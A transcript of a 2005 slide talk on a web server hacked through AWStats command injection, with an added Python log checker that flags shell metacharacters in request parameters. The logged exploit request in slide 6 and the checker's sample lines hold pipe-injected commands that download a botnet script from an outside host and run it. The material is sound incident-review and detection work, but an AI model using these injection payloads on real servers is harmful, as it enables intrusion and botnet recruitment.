The Anatomy of a Hack - PowerPoint PPT Presentation

Provided by: til42

Transcript and Presenter's Notes

1
The Anatomy of a Hack
March 2005
2
The vulnerabilities
  • 2005-02-25  AWStats Plugin Multiple Remote Command Execution Vulnerabilities
  • 2005-02-16  AWStats Logfile Parameter Remote Command Execution Vulnerability
  • 2005-02-16  AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability
  • 2005-02-16  AWStats Remote Command Execution Vulnerability
  • 2005-02-14  AWStats Debug Remote Information Disclosure Vulnerability
  • 2005-01-15  AWStats Multiple Unspecified Remote Input Validation Vulnerabilities

3
AWStats Multiple Unspecified Remote Input Validation Vulnerabilities (15 Jan)
  • Multiple unspecified remote input validation vulnerabilities affect AWStats. These issues are due to a failure of the application to perform proper validation on user-supplied input prior to using it to carry out some critical function.
  • Although unconfirmed, an attacker may leverage these issues to execute commands and disclose sensitive information with the privileges of the underlying Web server.

4
AWStats Remote Command Execution Vulnerability (16 Feb)
  • AWStats is reported prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.
  • An attacker can prefix arbitrary commands with the '|' character and have them executed in the context of the server through a URI parameter.

5
The First Probe
  • 05/Mar/2005:01:29:55 -0600 "GET //cgi-bin/awstats/awstats.pl?configdir20id20 HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

6
The Exploit
  • 13/Mar/2005:19:17:12 -0600 "POST /cgi-bin/awstats.pl?configdirecho20echo20killall2020perlcd20/tmpwget20ssh.a.la/botnetperl20botnetrm20botnetecho20echo HTTP/1.0" 200 414 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

7
Results of Exploits
  • Left lots of litter in /tmp
  • Opened up multiple listeners (est. 6)
  • Most were botnet daemons or backdoors
  • Cleanup has been fun and educational
  • No damage to the system, just had my ego dinged up a little
  • Valuable reminder: Don't get complacent

8
How I could have prevented it
  • Stay on top of vulnerabilities
  • They are always shortly followed by exploits
  • Patch/Upgrade as soon as possible
  • Review logs and check your file systems
  • E.g. /tmp would have been an easy tip-off
  • Know what listeners are running and check them regularly
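As an added example (not part of the presentation), a small Python checker for the log review recommended on this slide: it parses Apache combined-format lines, URL-decodes every query parameter of awstats.pl requests and flags those carrying shell metacharacters, separating a 404 probe from a 200 hit as in slides 5 and 6. The sample log lines, IP addresses and host name are constructed placeholders, not the real entries from the incident.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined-log format, modelled on the two
# entries in the slides; IPs, hostname and payloads are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Mar/2005:01:29:55 -0600] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
10.0.0.7 - - [05/Mar/2005:08:10:01 -0600] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 8421 "-" "Mozilla/5.0"
10.0.0.9 - - [13/Mar/2005:19:17:12 -0600] "POST /cgi-bin/awstats.pl?configdir=|cd%20/tmp;wget%20EXAMPLE-HOST/x;perl%20x| HTTP/1.0" 200 414 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Characters that mean nothing in a config or log file name but everything
# to a shell: their presence in a decoded parameter is the tell.
SHELL_META = re.compile(r'[|;`$&<>]')


def classify(status):
    """A 404 means the request never reached awstats.pl (a probe at the wrong
    path, as on slide 5); a 200 means the script ran with that input."""
    return 'probe' if status == 404 else ('hit' if status == 200 else 'other')


def suspicious_requests(log_text):
    """Return one dict per awstats.pl request whose URL-decoded query
    parameters contain shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group('target').partition('?')
        if 'awstats' not in path.lower():
            continue
        for pair in query.split('&'):
            name, _, value = pair.partition('=')
            decoded = unquote(value)
            if SHELL_META.search(decoded):
                status = int(m.group('status'))
                hits.append({'ts': m.group('ts'), 'ip': m.group('ip'),
                             'param': name, 'value': decoded,
                             'status': status, 'verdict': classify(status)})
    return hits
```

Running suspicious_requests(SAMPLE_LOG) returns two records, the 404 probe and the 200 hit, while the ordinary config=example.org request is left alone.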